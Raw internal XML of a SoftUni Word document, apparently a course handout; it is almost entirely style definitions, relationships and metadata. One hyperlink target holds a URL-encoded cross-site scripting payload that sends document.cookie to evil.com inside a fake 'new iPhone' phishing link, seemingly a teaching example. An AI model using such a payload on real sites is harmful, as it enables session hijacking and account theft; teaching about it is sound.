      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="4" w:customStyle="1">
    <w:name w:val="Заглавие 4 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="A34A0D"/>
      <w:sz w:val="28"/>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styleId="5" w:customStyle="1">
    <w:name w:val="Заглавие 5 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="008c5930"/>
    <w:rPr>
      <w:rFonts w:eastAsia="" w:cs="" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:color w:val="B2500E"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeChar" w:customStyle="1">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:qFormat/>
    <w:rsid w:val="008063e1"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Tgc" w:customStyle="1">
    <w:name w:val="_tgc"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00d8395c"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Style12" w:customStyle="1">
    <w:name w:val="Списък на абзаци Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005054c7"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00527be8"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:fill="E1DFDD" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Normaltextrun" w:customStyle="1">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00640e62"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Eop" w:customStyle="1">
    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00640e62"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel1">
    <w:name w:val="ListLabel 1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Wingdings"/>
      <w:b/>
      <w:sz w:val="12"/>
      <w:szCs w:val="24"/>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color w:val="0882DE"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="StrongEmphasis">
    <w:name w:val="Strong Emphasis"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SourceText">
    <w:name w:val="Source Text"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Bullets">
    <w:name w:val="Bullets"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:eastAsia="OpenSymbol" w:cs="OpenSymbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel11">
    <w:name w:val="ListLabel 11"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Wingdings"/>
      <w:b/>
      <w:sz w:val="12"/>
      <w:szCs w:val="24"/>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rFonts w:cs="Symbol"/>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eastAsia="Calibri" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel77">
    <w:name w:val="ListLabel 77"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0882DE"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel78">
    <w:name w:val="ListLabel 78"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Wingdings"/>
      <w:b/>
      <w:sz w:val="12"/>
      <w:szCs w:val="24"/>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eastAsia="Calibri" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel360">
    <w:name w:val="ListLabel 360"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="ListLabel361">
    <w:name w:val="ListLabel 361"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0882DE"/>
      <w:sz w:val="17"/>
      <w:szCs w:val="17"/>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rsid w:val="005054c7"/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:spacing w:before="0" w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HeaderandFooter">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style9"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008068a2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style10"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008068a2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="4680" w:leader="none"/>
        <w:tab w:val="right" w:pos="9360" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style11"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00564d7b"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00524789"/>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link w:val="Style12"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="008617b5"/>
    <w:pPr>
      <w:spacing w:before="80" w:after="120"/>
      <w:ind w:left="720" w:hanging="0"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code" w:customStyle="1">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="008063e1"/>
    <w:pPr/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraph" w:customStyle="1">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00640e62"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
      <w:pBdr>
        <w:bottom w:val="double" w:sz="2" w:space="0" w:color="808080"/>
      </w:pBdr>
      <w:spacing w:before="80" w:after="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="12"/>
      <w:szCs w:val="12"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PreformattedText">
    <w:name w:val="Preformatted Text"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="80" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quotations">
    <w:name w:val="Quotations"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="80" w:after="283"/>
      <w:ind w:left="567" w:right="567" w:hanging="0"/>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f">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="0076391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185.218.124.165/index.php?search_query=&lt;a+href%3D&quot;https%3A%2F%2Fvulnerable-site.com%2Fsearch%3Fsearch_query%3D&lt;script&gt;document.location%3D&apos;https%3A%2F%2Fevil.com%2Fsteal%3Fcookie%3D&apos;%2Bdocument.cookie&lt;%2Fscript&gt;&quot;&gt;+You+got+a+new+iPhone!+Click+here&lt;%2Fa&gt;"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hyperlink" Target="https://gitlab.com/softuniblogadmin/mybackup/-/commit/8970beca..."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Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml"/>
</Relationships>
</file>

<file path=word/_rels/footer1.xml.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.softuni.bg/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.softuni.bg/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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C18B0EB80FEC43B96FC4929E3ACDFF" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="6bb60d0f0e9e47938221aa118ad76888">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="4f985cec-e092-4bcf-a1e1-b816bd0221d8" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="d81d7665d4e84f7ea38159bca2b592d6" ns2:_="">
    <xsd:import namespace="4f985cec-e092-4bcf-a1e1-b816bd0221d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85cec-e092-4bcf-a1e1-b816bd0221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D4560-195A-44FF-8D30-1B344521AF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985cec-e092-4bcf-a1e1-b816bd0221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F6E877-42D5-49BF-ABBD-36D5F3F486D6}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{642AD100-1791-43AC-8FB0-4D3F7DB735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Application>Neat_Office/6.2.8.2$Windows_x86 LibreOffice_project/</Application>
  <Pages>3</Pages>
  <Words>358</Words>
  <Characters>1884</Characters>
  <CharactersWithSpaces>2213</CharactersWithSpaces>
  <Paragraphs>51</Paragraphs>
  <Company>SoftUni – https://about.softuni.bg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2019-11-12T12:29:00Z</dcterms:created>
  <dc:creator>Software University</dc:creator>
  <dc:description>© SoftUni – https://about.softuni.bg
© Software University – https://softuni.bg
Copyrighted document. Unauthorized copy, reproduction or use is not permitted.</dc:description>
  <cp:keywords>SoftUni Software University programming coding computer programming software development software engineering software technologies digital skills technical skills training course</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2015-10-26T22:35:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-01T15:40:12Z</dcterms:modified>
  <cp:revision>30</cp:revision>
  <dc:subject>Software Development</dc:subject>
  <dc:title>SoftUni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SoftUni – https://about.softuni.bg</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ContentTypeId">
    <vt:lpwstr>0x010100B6C18B0EB80FEC43B96FC4929E3ACDFF</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="category">
    <vt:lpwstr>computer programming;programming;software development;software engineering</vt:lpwstr>
  </property>
</Properties>
</file>